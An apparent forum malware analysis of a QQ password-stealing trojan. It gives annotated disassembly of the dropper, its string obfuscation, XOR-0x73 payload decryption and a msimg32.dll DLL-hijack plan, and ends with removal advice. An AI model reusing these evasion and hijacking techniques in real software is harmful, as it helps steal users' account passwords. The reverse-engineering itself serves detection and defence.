拿到这个样本时,它的名字叫"29.exe",用PEID查之:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],是个压缩壳;然后再看下它有没有附加数据,用Stud_PE查之,如果有,看来是木马生成器生成的!
OK.OD载入,ESP定律,迅速到达OEP!
; Entry right after the UPX stub (OEP at 00402310): fetch the module handle and
; the command line, stash both in globals, then call 00402390 with
; WinMain-style arguments. Only the first instructions were pasted; the run
; continues past the call.
00402310 6A 00 push 0 ; hModule = NULL -> handle of this image
00402312 FF15 18204000 call near dword ptr ds:[402018] ; kernel32.GetModuleHandleA
00402318 A3 A4364000 mov dword ptr ds:[4036A4], eax ; 29.00400000 -- g_hInstance = image base (read again at 0040232B and at 00401BEB)
0040231D FF15 14204000 call near dword ptr ds:[402014] ; kernel32.GetCommandLineA
00402323 6A 0A push 0A ; nCmdShow = 0A (SW_SHOWDEFAULT)
00402325 A3 A0364000 mov dword ptr ds:[4036A0], eax ; 29.00400000 -- g_cmdline = command-line pointer
0040232A 50 push eax ; lpCmdLine
0040232B A1 A4364000 mov eax, dword ptr ds:[4036A4] ; reload g_hInstance
00402330 6A 00 push 0 ; hPrevInstance = 0
00402332 50 push eax ; hInstance
00402333 E8 58000000 call 00402390 ; looks like WinMain(hInstance, 0, lpCmdLine, SW_SHOWDEFAULT); its body is listed below
代码层次比较多,一个个写的话会比较乱,所以就把主要地方贴在一起:
; 00402390: WinMain body. The listing stops at CreateWindowExA; the rest of the
; function (message loop, return) was not pasted.
; Builds two ASCII strings on the stack one byte at a time (no literal in the
; binary for a strings dump to find), fills a WNDCLASSEXA, registers it and
; creates a window whose procedure (00402340) runs the payload on WM_CREATE --
; so the CreateWindowExA call at the end is what actually triggers it.
; Offsets below are relative to E0 = esp right after "sub esp, 64":
;   E0+00 ..  : window title; the bytes spell "TM2010"
;   E0+08 ..  : class name; bytes as listed are T,X,G,d,i,F,o,u,i,d,a,t,i,o,n
;               (resembles Tencent's "TXGuiFoundation" class -- verify in the debugger)
;   E0+34 ..  : WNDCLASSEXA (cbSize 0x30)
;   E0+64     : return address; E0+68 : arg1 = hInstance
00402390 83EC 64 sub esp, 64 ; locals: two string buffers + WNDCLASSEXA (E0 = esp from here)
00402393 B0 69 mov al, 69 ; al = 'i'
00402395 53 push ebx ; save callee-saved ebx (esp = E0-4)
00402396 B3 64 mov bl, 64 ; bl = 'd'
00402398 884424 10 mov byte ptr ss:[esp+10], al ; E0+C  = 'i' (class-name byte 4)
0040239C 884424 14 mov byte ptr ss:[esp+14], al ; E0+10 = 'i'
004023A0 884424 18 mov byte ptr ss:[esp+18], al ; E0+14 = 'i'
004023A4 B8 30000000 mov eax, 30 ; eax = 0x30: used both as '0' and as sizeof(WNDCLASSEXA)
004023A9 885C24 0F mov byte ptr ss:[esp+F], bl ; E0+B  = 'd'
004023AD 885C24 15 mov byte ptr ss:[esp+15], bl ; E0+11 = 'd'
004023B1 56 push esi ; 29.00402340 -- save callee-saved esi (esp = E0-8)
004023B2 8B7424 70 mov esi, dword ptr ss:[esp+70] ; esi = arg1 = hInstance (module handle 00400000)
004023B6 33DB xor ebx, ebx ; ebx = 0, reused as NULL/zero below
004023B8 884424 0D mov byte ptr ss:[esp+D], al ; E0+5 = '0'
004023BC 884424 0B mov byte ptr ss:[esp+B], al ; E0+3 = '0'
004023C0 894424 3C mov dword ptr ss:[esp+3C], eax ; E0+34: wc.cbSize = 0x30
004023C4 B2 54 mov dl, 54 ; dl = 'T'
004023C6 B1 6F mov cl, 6F ; cl = 'o'
004023C8 8D4424 10 lea eax, dword ptr ss:[esp+10] ; eax = &classname (E0+8)
004023CC 68 007F0000 push 7F00 ; lpIconName = IDI_APPLICATION (0x7F00)
004023D1 53 push ebx ; hInstance = NULL (esp = E0-10)
004023D2 885424 18 mov byte ptr ss:[esp+18], dl ; E0+8 = 'T' -- from here on the strings are written into the locals one byte at a time, a common malware trick to keep them out of a strings scan
004023D6 C64424 19 58 mov byte ptr ss:[esp+19], 58 ; E0+9 = 'X'
004023DB C64424 1A 47 mov byte ptr ss:[esp+1A], 47 ; E0+A = 'G'
004023E0 C64424 1D 46 mov byte ptr ss:[esp+1D], 46 ; E0+D = 'F'
004023E5 884C24 25 mov byte ptr ss:[esp+25], cl ; E0+15 = 'o'
004023E9 884C24 1E mov byte ptr ss:[esp+1E], cl ; E0+E = 'o'
004023ED C64424 1F 75 mov byte ptr ss:[esp+1F], 75 ; E0+F = 'u'
004023F2 C64424 22 61 mov byte ptr ss:[esp+22], 61 ; E0+12 = 'a'
004023F7 C64424 23 74 mov byte ptr ss:[esp+23], 74 ; E0+13 = 't'
004023FC C64424 26 6E mov byte ptr ss:[esp+26], 6E ; E0+16 = 'n'
00402401 885C24 27 mov byte ptr ss:[esp+27], bl ; E0+17 = 0, terminator of the class name
00402405 885424 10 mov byte ptr ss:[esp+10], dl ; E0+0 = 'T' -- window title starts here
00402409 C64424 11 4D mov byte ptr ss:[esp+11], 4D ; E0+1 = 'M'
0040240E C64424 12 32 mov byte ptr ss:[esp+12], 32 ; E0+2 = '2'
00402413 C64424 14 31 mov byte ptr ss:[esp+14], 31 ; E0+4 = '1'  -> "TM2010"
00402418 885C24 16 mov byte ptr ss:[esp+16], bl ; E0+6 = 0, terminator of the title
0040241C C74424 48 03000>mov dword ptr ss:[esp+48], 3 ; wc.style = CS_VREDRAW | CS_HREDRAW
00402424 C74424 4C 40234>mov dword ptr ss:[esp+4C], 402340 ; wc.lpfnWndProc = 00402340 -- window procedure; put a breakpoint there
0040242C 895C24 50 mov dword ptr ss:[esp+50], ebx ; wc.cbClsExtra = 0
00402430 895C24 54 mov dword ptr ss:[esp+54], ebx ; wc.cbWndExtra = 0
00402434 897424 58 mov dword ptr ss:[esp+58], esi ; 29.00402340 -- wc.hInstance
00402438 C74424 64 10000>mov dword ptr ss:[esp+64], 10 ; wc.hbrBackground = 0x10 (COLOR_BTNFACE + 1)
00402440 895C24 68 mov dword ptr ss:[esp+68], ebx ; wc.lpszMenuName = NULL
00402444 894424 6C mov dword ptr ss:[esp+6C], eax ; wc.lpszClassName = &classname
00402448 FF15 CC204000 call near dword ptr ds:[4020CC] ; USER32.LoadIconA(NULL, IDI_APPLICATION)
0040244E 68 007F0000 push 7F00 ; lpCursorName = IDC_ARROW (0x7F00)
00402453 53 push ebx ; hInstance = NULL
00402454 894424 5C mov byte ptr ss:[esp+5C], eax ; wc.hIcon
00402458 894424 70 mov dword ptr ss:[esp+70], eax ; wc.hIconSm
0040245C FF15 D0204000 call near dword ptr ds:[4020D0] ; USER32.LoadCursorA(NULL, IDC_ARROW)
00402462 8D4C24 3C lea ecx, dword ptr ss:[esp+3C] ; ecx = &wc
00402466 51 push ecx
00402467 894424 5C mov dword ptr ss:[esp+5C], eax ; wc.hCursor
0040246B FF15 D4204000 call near dword ptr ds:[4020D4] ; USER32.RegisterClassExA(&wc) -- return value is not checked
00402471 53 push ebx ; lpParam = NULL
00402472 56 push esi ; 29.00402340 -- hInstance
00402473 53 push ebx ; hMenu = NULL
00402474 53 push ebx ; hWndParent = NULL
00402475 68 00000080 push 80000000 ; nHeight = CW_USEDEFAULT
0040247A 68 00000080 push 80000000 ; nWidth = CW_USEDEFAULT
0040247F 68 00000080 push 80000000 ; y = CW_USEDEFAULT
00402484 68 00000080 push 80000000 ; x = CW_USEDEFAULT
00402489 8D5424 28 lea edx, dword ptr ss:[esp+28] ; edx = &title (E0+0)
0040248D 68 0000CF00 push 0CF0000 ; dwStyle = WS_OVERLAPPEDWINDOW (WS_VISIBLE not set)
00402492 8D4424 34 lea eax, dword ptr ss:[esp+34] ; eax = &classname (E0+8)
00402496 52 push edx ; lpWindowName
00402497 50 push eax ; lpClassName
00402498 53 push ebx ; dwExStyle = 0
00402499 FF15 D8204000 call near dword ptr ds:[4020D8] ; CreateWindowExA -- it delivers WM_CREATE, so the breakpoint on the window procedure fires inside this call
; 00402340: window procedure registered by 00402390 (stdcall, 4 args, retn 10).
;   [esp+4] hWnd, [esp+8] uMsg, [esp+C] wParam, [esp+10] lParam
;   WM_CREATE  (1) -> call the payload at 004027F0, then ExitProcess(0)
;   WM_DESTROY (2) -> PostQuitMessage(0), return 0
;   anything else  -> DefWindowProcA
; WM_CREATE is delivered from inside CreateWindowExA, so the payload runs
; before the window is ever shown; the window exists only to trigger it.
00402340 8B4424 08 mov eax, dword ptr ss:[esp+8] ; eax = uMsg (window procedure entry)
00402344 83F8 02 cmp eax, 2 ; WM_DESTROY?
00402347 75 0D jnz short 00402356 ; 29.00402356
00402349 6A 00 push 0
0040234B FF15 F0204000 call near dword ptr ds:[4020F0] ; USER32.PostQuitMessage(0)
00402351 33C0 xor eax, eax ; return 0
00402353 C2 1000 retn 10
00402356 83F8 01 cmp eax, 1 ; WM_CREATE?
00402359 75 0D jnz short 00402368 ; 29.00402368
0040235B E8 90040000 call 004027F0 ; payload -- step into this one
00402360 6A 00 push 0
00402362 FF15 10204000 call near dword ptr ds:[402010] ; kernel32.ExitProcess(0) -- control never returns to CreateWindowExA
00402368 8B4C24 10 mov ecx, dword ptr ss:[esp+10] ; lParam
0040236C 8B5424 0C mov edx, dword ptr ss:[esp+C] ; USER32.77D18734 -- wParam
00402370 51 push ecx ; lParam
00402371 52 push edx ; wParam
00402372 50 push eax ; uMsg
00402373 8B4424 10 mov eax, dword ptr ss:[esp+10] ; hWnd (the three pushes above moved it from [esp+4] to [esp+10])
00402377 50 push eax ; hWnd
00402378 FF15 F4204000 call near dword ptr ds:[4020F4] ; USER32.DefWindowProcA(hWnd, uMsg, wParam, lParam)
0040237E C2 1000 retn 10 ; stdcall: callee pops the four args
; 004027F0: payload driver, reached from the window procedure on WM_CREATE.
; Calls four helpers in sequence, closes the window whose handle sits in the
; global at 403698, then terminates the process. What the helpers do is the
; author's debugger finding; their bodies are not in this listing, and which
; of them reaches the qq.exe/tm.exe scan at 004010E0 is not shown either.
004027F0 E8 0BFEFFFF call 00402600 ; per the author: checks whether the malware is already running
004027F5 E8 26000000 call 00402820 ; 29.00402820
004027FA E8 C1FFFFFF call 004027C0 ; 29.004027C0
004027FF A1 98364000 mov eax, dword ptr ds:[403698] ; eax = global window handle (presumably the window created in 00402390 -- confirm)
00402804 50 push eax
00402805 FF15 C4204000 call near dword ptr ds:[4020C4] ; USER32.CloseWindow(hWnd)
0040280B E8 60FEFFFF call 00402670 ; 29.00402670
00402810 6A 00 push 0
00402812 FF15 10204000 call near dword ptr ds:[402010] ; kernel32.ExitProcess(0) -- this function never returns to its caller
其中:qq.exe 进程名的比较方式也是一个字节一个字节地比较的(从下面的代码看,同样的方式还比较了tm.exe):
; 004010E0: scan the process list for a running QQ client.
; Returns in eax: 0 when the snapshot fails, Process32First fails, or nothing
; matches. The "found" path jumps to 00401209, just past this listing, so its
; return value is not visible here.
; The first six characters of szExeFile are compared case-insensitively,
; byte by byte, against "qq.exe" and then "tm.exe" -- no string literal is
; referenced. Character 6 is never tested, so any longer name with one of those
; prefixes also matches.
; Two defects visible in the listing: the snapshot handle in ebp is never
; closed on any exit path shown, and the inline strcpy below copies strlen+1
; bytes into a 40-byte buffer with no bound (a long exe name runs into pe).
; Stack layout after the four pushes (E1 = esp at that point):
;   E1+10 .. E1+37 : 40-byte copy of szExeFile
;   E1+38 ..       : PROCESSENTRY32 (dwSize 0x128); szExeFile is at E1+5C
004010E0 81EC 50010000 sub esp, 150 ; locals: name copy + PROCESSENTRY32
004010E6 53 push ebx
004010E7 55 push ebp
004010E8 56 push esi ; 29.00402340
004010E9 57 push edi ; E1 = esp after this push
004010EA 33C0 xor eax, eax
004010EC B9 49000000 mov ecx, 49 ; 0x49 dwords = 0x124 bytes
004010F1 8D7C24 3C lea edi, dword ptr ss:[esp+3C] ; edi = &pe + 4 (everything after dwSize)
004010F5 50 push eax ; th32ProcessID = 0
004010F6 F3:AB rep stos dword ptr es:[edi] ; zero the PROCESSENTRY32 body
004010F8 6A 02 push 2 ; dwFlags = TH32CS_SNAPPROCESS
004010FA C74424 40 28010>mov dword ptr ss:[esp+40], 128 ; pe.dwSize = 0x128 = sizeof(PROCESSENTRY32)
00401102 E8 CB170000 call 004028D2 ; jmp to kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
00401107 8BE8 mov ebp, eax ; ebp = snapshot handle
00401109 83FD FF cmp ebp, -1 ; INVALID_HANDLE_VALUE?
0040110C 75 0D jnz short 0040111B ; 29.0040111B
0040110E 5F pop edi ; 0012F838 -- snapshot failed: restore registers, return 0
0040110F 5E pop esi ; 0012F838
00401110 5D pop ebp ; 0012F838
00401111 33C0 xor eax, eax ; return 0
00401113 5B pop ebx ; 0012F838
00401114 81C4 50010000 add esp, 150
0040111A C3 retn
0040111B 8D4424 38 lea eax, dword ptr ss:[esp+38] ; eax = &pe
0040111F 50 push eax
00401120 55 push ebp
00401121 E8 B8170000 call 004028DE ; jmp to kernel32.Process32First(hSnapshot, &pe)
00401126 85C0 test eax, eax
00401128 75 0B jnz short 00401135 ; 29.00401135
0040112A 5F pop edi ; 0012F838 -- Process32First failed: eax is already 0
0040112B 5E pop esi ; 0012F838
0040112C 5D pop ebp ; 0012F838
0040112D 5B pop ebx ; 0012F838
0040112E 81C4 50010000 add esp, 150
00401134 C3 retn
00401135 B9 0A000000 mov ecx, 0A ; loop head: one process entry per iteration; 0xA dwords = 40 bytes
0040113A 33C0 xor eax, eax
0040113C 8D7C24 10 lea edi, dword ptr ss:[esp+10] ; edi = name copy buffer
00401140 8D5424 10 lea edx, dword ptr ss:[esp+10] ; edx = name copy buffer, kept for the copy below
00401144 F3:AB rep stos dword ptr es:[edi] ; zero the 40-byte buffer
00401146 8D7C24 5C lea edi, dword ptr ss:[esp+5C] ; edi = pe.szExeFile
0040114A 83C9 FF or ecx, FFFFFFFF
0040114D F2:AE repne scas byte ptr es:[edi] ; inline strlen
0040114F F7D1 not ecx ; ecx = strlen + 1
00401151 2BF9 sub edi, ecx ; edi back to the start of szExeFile
00401153 8BC1 mov eax, ecx ; eax = byte count
00401155 8BF7 mov esi, edi ; src = szExeFile
00401157 8BFA mov edi, edx ; dst = copy buffer
00401159 C1E9 02 shr ecx, 2
0040115C F3:A5 rep movs dword ptr es:[edi], dword p> ; inline strcpy: whole dwords first ...
0040115E 8BC8 mov ecx, eax
00401160 83E1 03 and ecx, 3
00401163 F3:A4 rep movs byte ptr es:[edi], byte ptr> ; ... then the 0-3 remaining bytes; the count is never capped at 40
00401165 8A4C24 10 mov cl, byte ptr ss:[esp+10] ; cl = name[0]
00401169 8A5424 13 mov dl, byte ptr ss:[esp+13] ; dl = name[3]
0040116D 8A4424 11 mov al, byte ptr ss:[esp+11] ; al = name[1]
00401171 80F9 51 cmp cl, 51 ; --- pattern 1, "qq.exe": name[0] == 'Q'
00401174 74 05 je short 0040117B ; 29.0040117B
00401176 80F9 71 cmp cl, 71 ; or 'q'
00401179 75 35 jnz short 004011B0 ; 29.004011B0 -- no: try pattern 2
0040117B 3C 51 cmp al, 51 ; name[1] == 'Q'
0040117D 74 04 je short 00401183 ; 29.00401183
0040117F 3C 71 cmp al, 71 ; or 'q'
00401181 75 2D jnz short 004011B0 ; 29.004011B0
00401183 807C24 12 2E cmp byte ptr ss:[esp+12], 2E ; name[2] == '.'
00401188 75 26 jnz short 004011B0 ; 29.004011B0
0040118A 8A5C24 14 mov bl, byte ptr ss:[esp+14] ; bl = name[4]
0040118E 80FB 58 cmp bl, 58 ; 'X'
00401191 74 05 je short 00401198 ; 29.00401198
00401193 80FB 78 cmp bl, 78 ; or 'x'
00401196 75 18 jnz short 004011B0 ; 29.004011B0
00401198 80FA 45 cmp dl, 45 ; name[3] == 'E'
0040119B 74 05 je short 004011A2 ; 29.004011A2
0040119D 80FA 65 cmp dl, 65 ; or 'e'
004011A0 75 0E jnz short 004011B0 ; 29.004011B0
004011A2 8A5C24 15 mov bl, byte ptr ss:[esp+15] ; bl = name[5]
004011A6 80FB 45 cmp bl, 45 ; 'E'
004011A9 74 5E je short 00401209 ; 29.00401209 -- "qq.exe" found
004011AB 80FB 65 cmp bl, 65 ; or 'e'
004011AE 74 59 je short 00401209 ; 29.00401209 -- found
004011B0 3C 4D cmp al, 4D ; --- pattern 2, "tm.exe": name[1] == 'M'
004011B2 74 04 je short 004011B8 ; 29.004011B8
004011B4 3C 6D cmp al, 6D ; or 'm'
004011B6 75 33 jnz short 004011EB ; 29.004011EB -- no match: next process
004011B8 807C24 12 2E cmp byte ptr ss:[esp+12], 2E ; name[2] == '.'
004011BD 75 2C jnz short 004011EB ; 29.004011EB
004011BF 80FA 45 cmp dl, 45 ; name[3] == 'E'
004011C2 74 05 je short 004011C9 ; 29.004011C9
004011C4 80FA 65 cmp dl, 65 ; or 'e'
004011C7 75 22 jnz short 004011EB ; 29.004011EB
004011C9 8A4424 14 mov al, byte ptr ss:[esp+14] ; al = name[4]
004011CD 3C 58 cmp al, 58 ; 'X'
004011CF 74 04 je short 004011D5 ; 29.004011D5
004011D1 3C 78 cmp al, 78 ; or 'x'
004011D3 75 16 jnz short 004011EB ; 29.004011EB
004011D5 8A4424 15 mov al, byte ptr ss:[esp+15] ; al = name[5]
004011D9 3C 45 cmp al, 45 ; 'E'
004011DB 74 04 je short 004011E1 ; 29.004011E1
004011DD 3C 65 cmp al, 65 ; or 'e'
004011DF 75 0A jnz short 004011EB ; 29.004011EB
004011E1 80F9 54 cmp cl, 54 ; name[0] == 'T' (checked last)
004011E4 74 23 je short 00401209 ; 29.00401209 -- "tm.exe" found
004011E6 80F9 74 cmp cl, 74 ; or 't'
004011E9 74 1E je short 00401209 ; 29.00401209 -- found
004011EB 8D4C24 38 lea ecx, dword ptr ss:[esp+38] ; ecx = &pe
004011EF 51 push ecx
004011F0 55 push ebp
004011F1 E8 E2160000 call 004028D8 ; jmp to kernel32.Process32Next(hSnapshot, &pe)
004011F6 85C0 test eax, eax
004011F8 ^ 0F85 37FFFFFF jnz 00401135 ; 29.00401135 -- more entries: loop
004011FE 5F pop edi ; 0012F838 -- end of list, nothing matched: eax = 0
004011FF 5E pop esi ; 0012F838
00401200 5D pop ebp ; 0012F838
00401201 5B pop ebx ; 0012F838
00401202 81C4 50010000 add esp, 150
00401208 C3 retn ; the "found" exit at 00401209 follows but was not pasted
; Fragment at 004016CD: passes the literal "QQ2010" to 004013E0. Per the
; author's tracing, that routine looks up the QQ install path in the registry
; and then tests whether tssafeedit.dat exists in that directory.
004016CD 56 push esi
004016CE 68 38214000 push 402138 ; ASCII "QQ2010"
004016D3 E8 08FDFFFF call 004013E0 ; per the author: registry lookup of the QQ path, then a check for tssafeedit.dat in that directory
判断msimg32.dll文件是否存在,存在就说明病毒已经运行过了,如果不存在就创建一个。msimg32.dll本来是系统DLL,在QQ目录下放一个同名文件就会被QQ优先加载,所以看名称就知道是准备用DLL劫持技术了!
然后删除AutoLogin.dat文件,看名称就可以猜到这是QQ自动登录用的文件
然后判断"C:\Program Files\Tencent\QQ\Users\All Users\QQ\Registry.db"文件是否存在,如果存在的话就会执行下面的代码
00401BE1 8D4C24 2C lea ecx, dword ptr ss:[esp+2C]
00401BE5 51 push ecx ; ntdll.7C92F641
00401BE6 E8 65FCFFFF call 00401850 ; 29.00401850
00401BEB 8B15 A4364000 mov edx, dword ptr ds:[4036A4] ; 29.00400000
00401BF1 81C2 18960100 add edx, 19618
00401BF7 52 push edx ; ntdll.KiFastSystemCallRet
00401BF8 E8 93000000 call 00401C90 ; 打开自己 读入附加数据
; Decryption loop at 00401C0A (eax and esi are set up before this fragment):
; in-place single-byte XOR with key 0x73 over 0x8587 (34183) bytes at esi.
; Fixed key and fixed length, so the embedded PE can be recovered statically
; for detection without running the sample.
00401C0A 8A1C30 mov bl, byte ptr ds:[eax+esi] ; bl = buf[eax]
00401C0D 80F3 73 xor bl, 73 ; bl ^= 0x73
00401C10 881C30 mov byte ptr ds:[eax+esi], bl ; buf[eax] = bl (written back in place)
00401C13 40 inc eax
00401C14 3D 87850000 cmp eax, 8587
00401C19 ^ 72 EF jb short 00401C0A ; while (eax < 0x8587): decrypts a second PE file kept in the data section (first layer; 00403280 below handles the second)
00401C44 51 push ecx ; MSVCRT.77BFC2E3
00401C45 68 87850000 push 8587
00401C4A 50 push eax
00401C4B 56 push esi ; 29.0041108C
00401C4C E8 2F160000 call 00403280 ; 解密一个放在数据段另一个PE 文件(第二层)
00401C51 8B15 B4364000 mov edx, dword ptr ds:[4036B4]
00401C57 81C2 1C110000 add edx, 111C
00401C5D 52 push edx
00401C5E E8 CDFAFFFF call 00401730 ; 然后在偏移111C 处将读取出来的附加数据覆盖上去
00401C63 A1 B8364000 mov eax, dword ptr ds:[4036B8]
00401C68 8B0D B4364000 mov ecx, dword ptr ds:[4036B4]
00401C6E 50 push eax
00401C6F 8D9424 30010000 lea edx, dword ptr ss:[esp+130]
00401C76 51 push ecx
00401C77 52 push edx
00401C78 E8 E3FAFFFF call 00401760 ; 这里就是增肥了,随机生成一些字节,循环写入N 次,放在文件尾,可以直接咔嚓掉
[ATTACH]57983[/ATTACH]
[ATTACH]57984[/ATTACH]
[ATTACH]57985[/ATTACH]
然后退出,自删除,等QQ运行后加载msimg32.dll之后盗取QQ密码!
楼下分析msimg32(重点),该木马只需要删除msimg32.dll就等于清除了木马,该文件被隐藏,请用XUETR等工具删除!